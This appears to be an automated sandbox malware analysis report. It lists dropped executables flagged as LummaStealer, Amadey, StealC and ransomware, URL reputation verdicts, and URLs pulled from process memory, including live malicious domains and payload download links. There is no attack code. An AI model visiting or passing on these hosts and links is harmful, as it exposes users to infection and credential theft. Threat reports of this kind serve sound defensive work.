C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\C1J7SVw[1].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	67%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exe	26%	ReversingLabs	Win32.Trojan.Sonbokli
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe	24%	ReversingLabs	Win32.PUA.ConnectWise
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exe	58%	ReversingLabs	Win64.Trojan.Marte
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[3].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	62%	ReversingLabs	Win32.Trojan.LummaC
C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe	58%	ReversingLabs	Win64.Trojan.Marte
C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe	26%	ReversingLabs	Win32.Trojan.Sonbokli
C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe	24%	ReversingLabs	Win32.PUA.ConnectWise
C:\Users\user\AppData\Local\Temp\1015364001\b2d27d0fa4.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1015365001\82bc687fc3.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1015366001\dce9e93496.exe	67%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI85002\_bz2.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label
https://importlib-metadata.readthedocs.io/	0%	Avira URL Cloud	safe
https://blog.jaraco.com/skeleton	0%	Avira URL Cloud	safe
https://wheel.readthedocs.io/en/stable/news.html	0%	Avira URL Cloud	safe
dare-curbys.biz	100%	Avira URL Cloud	malware
https://docs.googl	0%	Avira URL Cloud	safe
formy-spill.biz	100%	Avira URL Cloud	malware
http://blog.cryptographyengineering	0%	Avira URL Cloud	safe
https://drive-connect.cyou/api	100%	Avira URL Cloud	malware
https://refspecs.linuxfoundation.org/elf/gabi4	0%	Avira URL Cloud	safe
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	0%	Avira URL Cloud	safe
https://drive-daily-5.corp.google.com/	0%	Avira URL Cloud	safe
http://crl4.dig	0%	Avira URL Cloud	safe
https://drive-daily-1.corp.google.com/	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://drive-daily-2.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-preprod.corp.google.com/	0%	Avira URL Cloud	safe
http://json.org	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
dare-curbys.biz	true	Avira URL Cloud: malware	unknown
formy-spill.biz	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/missingauth	dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635668000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F076F000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673467025.000001B3F076F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/w	AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/astral-sh/ruff	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.js5B84B98D	t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/eda)R	dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575244843.0000022432655000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/issues	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonn	t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0750000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.jsBE261D66	dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonN/Aipcountry	dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp	false		high
https://chrome.google.com/webstore85	dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/#settings	t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wheel.readthedocs.io/en/stable/news.html	LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/f	dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-connect.cyou/api	b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269581333238.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269620341236.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.000000000122D000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269582254227.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269597245823.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269582406764.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269585020635.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269583843534.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269569320585.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269602098460.00000000039E2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down	t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE88C000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp	false		high
https://importlib-metadata.readthedocs.io/	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip	dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp	false		high
https://docs.google.com/	t5abhIx.exe, 0000002B.00000003.269667407590.000001B3EE927000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonr	AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE96000.00000004.00000020.00020000.00000000.sdmp	false		high
http://drive.google.com/C	dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp	false		high
https://readthedocs.org/projects/importlib-metadata/badge/?version=latest	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp	b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://refspecs.linuxfoundation.org/elf/gabi4	LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/#settings4D9F34260	dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/json_	dwVrTdy.exe, 00000028.00000002.269666025995.00000256362A6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.cryptographyengineering	LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/json	t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8A7000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp	false		high
https://ipinfo.io/jsonb	AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADEED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.jsoo	AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621997024.00000247ADEC6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADEC7000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621655336.00000247ADEC4000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.jaraco.com/skeleton	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.googl	AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/?usp=chrome_appC86DD1F748C	dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmp	false		high
http://drive.google.com/.	dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreu	AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/gest	AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonV	t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0750000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md	LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://json.org	LoaderClient.exe, 0000002F.00000003.269862182845.00000178EAD33000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269865781012.00000178EAF92000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269882547550.00000178EAD34000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269857780538.00000178EAD32000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852023135.00000178EAD20000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/jsonR	AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE96000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.google.com/kRequested	dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/ormF	t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/M	dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575078876.0000022432692000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/ieda	dwVrTdy.exe, 00000028.00000003.269594135639.000002563561D000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.000002563561D000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594706087.000002563561D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.jsA80DFEA	dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://drive.google.com/k	dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/#settings/crx	dwVrTdy.exe, 00000026.00000003.269575988391.000002243263A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574467579.000002243262F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575367638.0000022432639000.00000004.00000020.00020000.00000000.sdmp	false		high
http://drive.google.com/j	dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	t5abhIx.exe, 0000002B.00000003.269667407590.000001B3EE927000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstorec	dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/U	dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pypa/wheel	LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/dev/peps/pep-0427/	LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.js	t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com	b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreN	AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	false		high
